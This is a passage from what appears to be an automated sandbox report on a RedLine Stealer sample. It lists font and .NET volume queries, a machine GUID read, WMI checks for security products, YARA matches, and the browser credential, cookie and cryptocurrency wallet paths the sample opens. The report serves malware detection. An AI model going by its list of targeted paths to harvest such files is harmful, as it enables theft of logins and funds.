                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: yGu4YUwMl6.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7452, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPE
